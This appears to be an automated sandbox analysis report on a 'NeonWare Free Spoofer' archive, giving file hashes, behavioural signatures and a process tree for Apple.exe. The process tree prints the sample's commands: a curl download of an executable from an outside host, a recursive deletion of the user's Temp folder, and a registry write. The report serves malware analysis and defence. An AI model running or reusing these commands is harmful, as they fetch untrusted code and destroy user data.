Overview
overview
9Static
static
3NeonWare F...le.exe
windows7-x64
6NeonWare F...le.exe
windows10-2004-x64
6NeonWare F...er.bat
windows7-x64
7NeonWare F...er.bat
windows10-2004-x64
7NeonWare F...of.bat
windows7-x64
3NeonWare F...of.bat
windows10-2004-x64
3NeonWare F...es.bat
windows7-x64
9NeonWare F...es.bat
windows10-2004-x64
9NeonWare F...dr.sys
windows10-2004-x64
1NeonWare F...2).exe
windows7-x64
1NeonWare F...2).exe
windows10-2004-x64
1Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
23-08-2024 16:02
Static task
static1
Behavioral task
behavioral1
Sample
NeonWare Free Spoofer/Apple.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
NeonWare Free Spoofer/Apple.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
NeonWare Free Spoofer/Trace Cleaner.bat
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
NeonWare Free Spoofer/Trace Cleaner.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
NeonWare Free Spoofer/alternate mac spoof.bat
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
NeonWare Free Spoofer/alternate mac spoof.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
NeonWare Free Spoofer/deep traces.bat
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
NeonWare Free Spoofer/deep traces.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
NeonWare Free Spoofer/dr.sys
Resource
win10v2004-20240802-en
Behavioral task
behavioral10
Sample
NeonWare Free Spoofer/map (2).exe
Resource
win7-20240704-en
Behavioral task
behavioral11
Sample
NeonWare Free Spoofer/map (2).exe
Resource
win10v2004-20240802-en
General
-
Target
NeonWare Free Spoofer/Apple.exe
-
Size
231KB
-
MD5
2340b8a2bd837a5cff9b309477e482f7
-
SHA1
9388ce8dd1e17e680e6ccf130e5a07beb06d0df8
-
SHA256
5e1d6c967328d7b5c61028616420b13c83c3609bdc7667f75bbd923118dca19e
-
SHA512
f44d430b857a52e39ba9b3d0c831dcf74663351046e472b8c265421e3d05ea14870776a18651658eaa509ccdae8ead2cadce6a54cbf14e625d844d7a933a8259
-
SSDEEP
3072:wYwfMXIzqQWIY1LgWqoMcwBpdIi6MTBsOzu7m2N943SVMG34DmfGGEbt4m2b3cTd:6fMXIe/14ogFIk3LFCa7k
Malware Config
Signatures
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2040 wrote to memory of 2864 2040 Apple.exe 31 PID 2040 wrote to memory of 2864 2040 Apple.exe 31 PID 2040 wrote to memory of 2864 2040 Apple.exe 31 PID 2040 wrote to memory of 2368 2040 Apple.exe 32 PID 2040 wrote to memory of 2368 2040 Apple.exe 32 PID 2040 wrote to memory of 2368 2040 Apple.exe 32 PID 2040 wrote to memory of 1996 2040 Apple.exe 33 PID 2040 wrote to memory of 1996 2040 Apple.exe 33 PID 2040 wrote to memory of 1996 2040 Apple.exe 33 PID 2040 wrote to memory of 2052 2040 Apple.exe 34 PID 2040 wrote to memory of 2052 2040 Apple.exe 34 PID 2040 wrote to memory of 2052 2040 Apple.exe 34 PID 2040 wrote to memory of 2304 2040 Apple.exe 35 PID 2040 wrote to memory of 2304 2040 Apple.exe 35 PID 2040 wrote to memory of 2304 2040 Apple.exe 35 PID 2040 wrote to memory of 2340 2040 Apple.exe 36 PID 2040 wrote to memory of 2340 2040 Apple.exe 36 PID 2040 wrote to memory of 2340 2040 Apple.exe 36 PID 2340 wrote to memory of 2344 2340 cmd.exe 37 PID 2340 wrote to memory of 2344 2340 cmd.exe 37 PID 2340 wrote to memory of 2344 2340 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\NeonWare Free Spoofer\Apple.exe"C:\Users\Admin\AppData\Local\Temp\NeonWare Free Spoofer\Apple.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -L http://zerocdn.com/684873183/apple.exe --output -2⤵PID:2864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c title Apple Cleaner2⤵PID:1996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rmdir /S /Q %USERPROFILE%\AppData\Local\Temp > NUL 2>&12⤵PID:2304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKCU\Software\Applehmm" /v "True" /t REG_SZ /d "1" /f > NUL 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Applehmm" /v "True" /t REG_SZ /d "1" /f3⤵PID:2344
-
-